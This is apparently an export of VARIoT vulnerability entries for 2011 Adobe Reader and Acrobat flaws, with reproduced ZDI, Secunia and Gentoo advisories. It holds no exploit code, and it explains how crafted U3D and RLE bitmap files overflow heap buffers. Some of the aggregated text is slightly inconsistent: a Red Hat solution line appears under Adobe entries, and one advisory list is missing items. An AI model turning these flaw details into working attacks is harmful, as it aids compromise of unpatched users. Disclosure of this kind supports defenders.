VARIoT IoT vulnerabilities database


VAR-201102-0063 CVE-2011-0591 Adobe Reader and Acrobat Vulnerable to arbitrary code execution
CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, related to Texture and rgba, a different vulnerability than CVE-2011-0590, CVE-2011-0592, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600.

Adobe Reader and Acrobat contain a vulnerability that allows arbitrary code execution. This vulnerability is distinct from CVE-2011-0590, CVE-2011-0592, CVE-2011-0593, CVE-2011-0595 and CVE-2011-0600. A third party may execute arbitrary code via a crafted 3D file.

User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the application's implementation of an image format supported by the Universal 3D compressed file format. When decoding the image data provided by the file, the application uses one size to allocate the destination buffer and then trusts the file's own data when decompressing into that buffer. Because the decompression is not bounded by the actual size of that buffer, a buffer overflow can be triggered, leading to code execution in the context of the application.

For more information: SA43207
SOLUTION: Updated packages are available via Red Hat Network.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More details can be found at:
http://www.adobe.com/support/security/bulletins/apsb11-03.html

-- Disclosure Timeline:
2010-09-29 - Vulnerability reported to vendor
2011-02-08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Peter Vreugdenhil ( http://vreugdenhilresearch.nl )

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter: http://twitter.com/thezdi

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities

SECUNIA ADVISORY ID:
SA43207

VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207

RELEASE DATE:
2011-02-09

DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments

DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system.

2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow code execution.
9) An unspecified error may allow code execution.
10) An input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code execution.
19) A boundary error when decoding U3D image data in a FLI file can be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and number of colors of 4/8-bit RLE compressed BMP files can be exploited to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code execution.
26) An input validation error can be exploited to conduct cross-site scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow code execution.
28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing an ILBM texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267

The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior.

SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.

PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.

The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.

ORIGINAL ADVISORY:
Adobe (APSB11-03):
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html

ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/

FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html

iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891

----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help private users keep their systems up to date against the latest vulnerabilities.

Subscribe:
http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/

Please Note:
Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
----------------------------------------------------------------------

Please review the CVE identifiers referenced below for details.

Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"

References
==========
[ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369

Availability
============
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml

Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0059 CVE-2011-0599 Adobe Reader and Acrobat Vulnerable to arbitrary code execution
CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
The Bitmap parsing component in rt3d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to execute arbitrary code via a crafted image that causes an invalid pointer calculation related to 4/8-bit RLE compression, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0602.

Adobe Reader and Acrobat contain a vulnerability that allows arbitrary code execution. This vulnerability is distinct from CVE-2011-0596, CVE-2011-0598 and CVE-2011-0602. A third party may execute arbitrary code via a crafted image.

User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw exists within the Bitmap parsing component of rt3d.dll. When allocating a destination buffer for handling 4/8-bit RLE compressed bitmaps, the process uses the bitmap's bits-per-pixel and number-of-colors values directly from the file. A pointer is then computed from the specified color depth and used to copy user-supplied data into the fixed-length color data buffer on the heap.

For more information: SA43207
SOLUTION: Updated packages are available via Red Hat Network.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More details can be found at:
http://www.adobe.com/support/security/bulletins/apsb11-03.html

-- Disclosure Timeline:
2010-11-15 - Vulnerability reported to vendor
2011-02-08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Peter Vreugdenhil ( http://vreugdenhilresearch.nl )

Secunia advisory SA43207 and Gentoo GLSA 201201-19, which also cover this CVE, are reproduced in full under VAR-201102-0063 above.
VAR-201102-0032 CVE-2011-0586 Adobe Reader and Acrobat Vulnerable to arbitrary code execution
CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X do not properly validate unspecified input data, which allows attackers to execute arbitrary code via unknown vectors. Adobe Acrobat and Reader are prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.

For more information: SA43207
SOLUTION: Updated packages are available via Red Hat Network.

----------------------------------------------------------------------

TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities

SECUNIA ADVISORY ID:
SA43207

VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/

RELEASE DATE:
2011-02-09

DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system.

1) An unspecified error related to library loading can be exploited to execute arbitrary code.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow code execution.
8) An unspecified error related to library loading can be exploited to execute arbitrary code.
9) An unspecified error may allow code execution.
10) An input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site scripting attacks.
12) An unspecified error related to library loading can be exploited to execute arbitrary code.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code execution.
19) A boundary error when decoding U3D image data in a FLI file can be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and number of colors of 4/8-bit RLE compressed BMP files can be exploited to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code execution.
26) An input validation error can be exploited to conduct cross-site scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow code execution.
28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing an ILBM texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267

The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior.

SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.

PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.

The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.

ORIGINAL ADVISORY:
Adobe (APSB11-03):
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html

ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/

FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html

iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891

----------------------------------------------------------------------

About:
This Advisory was delivered by Secunia as a free service to help private users keep their systems up to date against the latest vulnerabilities.

Subscribe:
http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/

Please Note:
Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.

----------------------------------------------------------------------

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Adobe Reader: Multiple vulnerabilities
      Date: January 30, 2012
      Bugs: #354211, #382969, #393481
        ID: 201201-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in Adobe Reader might allow remote attackers to execute arbitrary code or conduct various other attacks.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  app-text/acroread          < 9.4.7                      >= 9.4.7

Description
===========

Multiple vulnerabilities have been discovered in Adobe Reader. Please review the CVE identifiers referenced below for details.

Impact
======

A remote attacker could entice a user to open a specially crafted PDF file using Adobe Reader, possibly resulting in the remote execution of arbitrary code, a Denial of Service, or other impact.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Adobe Reader users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"

References
==========

[ 1 ] CVE-2010-4091  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0033 CVE-2011-0587 Adobe Reader and Acrobat Vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0604. A cross-site scripting vulnerability exists in Adobe Reader and Acrobat. This is a different vulnerability from CVE-2011-0604. Arbitrary web script or HTML may be injected by a third party. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Remote attackers can inject arbitrary web scripts or HTML with unknown vectors.

For more information: SA43207
SOLUTION: Updated packages are available via Red Hat Network.
VAR-201102-0031 CVE-2011-0585 Adobe Reader and Acrobat Vulnerable to arbitrary code execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0565. This is a different vulnerability from CVE-2011-0565. An attacker could cause a denial of service (DoS) or execute arbitrary code. Adobe Acrobat and Reader are prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the affected application to crash. Arbitrary code execution may be possible; this has not been confirmed. Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.

For more information: SA43207
SOLUTION: Updated packages are available via Red Hat Network.
